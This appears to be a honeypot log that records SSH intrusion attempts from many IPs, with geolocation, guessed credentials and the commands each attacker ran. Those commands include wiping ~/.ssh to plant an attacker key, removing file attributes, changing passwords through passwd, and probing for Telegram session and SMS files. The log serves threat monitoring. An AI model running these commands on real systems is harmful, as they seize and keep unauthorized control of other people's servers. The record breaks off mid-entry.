$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—3
โ†ณ SSH key persistence
๐ŸŽญ aloof_merlion_root_227 (43.134.182.227) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-09 11:17 EDT ยท as user/password
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ gnarled_junk_root_54 (103.231.14.54) โ€” San Po Kong, Hong Kong ยท 2 sessions ยท 4 cmds
2026-05-09 10:37 EDT ยท as oracle/or, oracle/redhat
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ murky_liberty_root (34.135.200.178) โ€” Council Bluffs, United States ยท 1 session ยท 2 cmds
2026-05-09 10:11 EDT ยท as oracle/123456789
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ derelict_mekong_root (171.244.143.209) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-05-09 10:04 EDT ยท as oracle/Oracle
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ clandestine_junk_root (47.83.146.86) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-09 09:54 EDT ยท as oracle/test1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ lurking_viking_root (31.208.22.146) โ€” Gothenburg, Sweden ยท 1 session ยท 2 cmds
2026-05-09 08:14 EDT ยท as oracle/1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_star_root (107.150.103.12) โ€” Los Angeles, United States ยท 1 session ยท 2 cmds
2026-05-09 08:05 EDT ยท as oracle/oracle2019
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rabid_void_root (37.27.214.143) โ€” Helsinki, Finland ยท 16 sessions ยท 16 cmds
2026-05-09 04:09 EDT ยท as admin/admin, admin/password, deploy/deploy123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—16
๐ŸŽญ weary_wok_sol (120.26.32.101) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-09 03:48 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_phantom_root_49 (181.233.152.49) โ€” San Isidro, Peru ยท 3 sessions ยท 42 cmds
2026-05-08 17:30 EDT ยท as oracle/12345, oracle/1qaz2wsx#EDC, oracle/zaq1xsw2
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—3
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—3
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo -e "zaq1xsw2\nW4bsjTtXpfpR\nW4bsjTtXpfpR"|passwd|bash
$ Enter new UNIX password: ร—2
$ echo "zaq1xsw2\nW4bsjTtXpfpR\nW4bsjTtXpfpR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo -e "12345\nIasDhrfSIqH6\nIasDhrfSIqH6"|passwd|bash
$ echo "12345\nIasDhrfSIqH6\nIasDhrfSIqH6\n"|passwd
๐ŸŽญ rogue_bibimbap_root (220.74.57.165) โ€” Uiwang, South Korea ยท 1 session ยท 9 cmds
2026-05-09 03:04 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ grumpy_muay_root (147.50.103.212) โ€” Phaya Thai, Thailand ยท 2 sessions ยท 4 cmds
2026-05-09 01:42 EDT ยท as oracle/Hello123, oracle/P@ssw0rd
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ vapor_junk_root_24 (47.86.104.24) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-09 00:24 EDT ยท as root/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ unhinged_bike_sol (2.57.122.210) โ€” Amsterdam, The Netherlands ยท 11 sessions ยท 11 cmds
2026-05-08 22:17 EDT ยท as firedancer/firedancer, raydium/raydium, sol/123
Ran uname 132x across 132 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—11
โ†ณ obfuscated system check
๐ŸŽญ hollow_static_root (138.84.53.240) โ€” Bogota, Colombia ยท 3 sessions ยท 6 cmds
2026-05-08 23:54 EDT ยท as admin/admin, oracle/Oracle123$, oracle/oracle_123
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—3
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—3
โ†ณ SSH key persistence
๐ŸŽญ velvet_bibimbap_root (47.80.59.241) โ€” Seoul, South Korea ยท 1 session ยท 1 cmd
2026-05-08 23:27 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ glitchy_gouda_root (45.156.87.99) โ€” Eygelshoven, The Netherlands ยท 70 sessions ยท 70 cmds
2026-05-06 21:17 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—70
๐ŸŽญ grumpy_panda_root_60 (180.76.245.60) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-05-08 20:57 EDT ยท as oracle/admin123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ jittery_samba_root (201.63.223.138) โ€” Sรฃo Paulo, Brazil ยท 1 session ยท 2 cmds
2026-05-08 20:37 EDT ยท as oracle/admin123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ clandestine_silk (121.43.75.36) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-08 20:34 EDT ยท as tomcat/tomcat
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ brisk_jade_root (125.39.93.73) โ€” Wanghailou, China ยท 1 session ยท 2 cmds
2026-05-08 20:16 EDT ยท as oracle/oracle123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_lantern_root (106.38.205.224) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-05-08 20:10 EDT ยท as oracle/oracle123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ listless_kimchi_root (43.164.132.13) โ€” Seoul, South Korea ยท 1 session ยท 1 cmd
2026-05-08 19:11 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ obsidian_neon_db (47.83.174.0) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-08 17:06 EDT ยท as oracle/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ midnight_burger (47.253.138.112) โ€” Charlottesville, United States ยท 1 session ยท 1 cmd
2026-05-08 14:03 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ gnarled_durian_root (47.236.161.239) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-08 12:25 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ zealous_batik_root (163.7.5.228) โ€” Banguntapan, Indonesia ยท 1 session ยท 2 cmds
2026-05-08 12:00 EDT ยท as oracle/oracle2021
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_jade_root (120.48.154.88) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-05-08 11:47 EDT ยท as oracle/1q2w3e
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wired_lantern_root (14.18.113.233) โ€” Guangzhou, China ยท 1 session ยท 20 cmds
2026-05-08 11:41 EDT ยท as oracle/1q2w3e
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1q2w3e\na0Ik2jHddA2W\na0Ik2jHddA2W"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e\na0Ik2jHddA2W\na0Ik2jHddA2W\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ silent_rooibos_root (94.156.152.18) โ€” Centurion, South Africa ยท 2 sessions ยท 2 cmds
2026-05-07 08:35 EDT ยท as root/1234
privilege check โ†’ hostname discovery
$ whoami
โ†ณ privilege check
$ hostname
โ†ณ hostname discovery
๐ŸŽญ vapor_harbor_root (47.243.50.253) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-08 10:26 EDT ยท as oracle/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ lurking_hanbok_root (118.35.127.66) โ€” Dong-gu, South Korea ยท 1 session ยท 2 cmds
2026-05-08 10:24 EDT ยท as oracle/enisenes12
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_wraith_root (190.181.4.12) โ€” La Paz, Bolivia ยท 1 session ยท 2 cmds
2026-05-08 10:18 EDT ยท as oracle/enisenes12
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ manic_lotus_root (171.244.141.86) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-05-08 10:08 EDT ยท as oracle/enisenes12
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_cactus_root_18 (187.212.38.18) โ€” Puebla City, Mexico ยท 4 sessions ยท 8 cmds
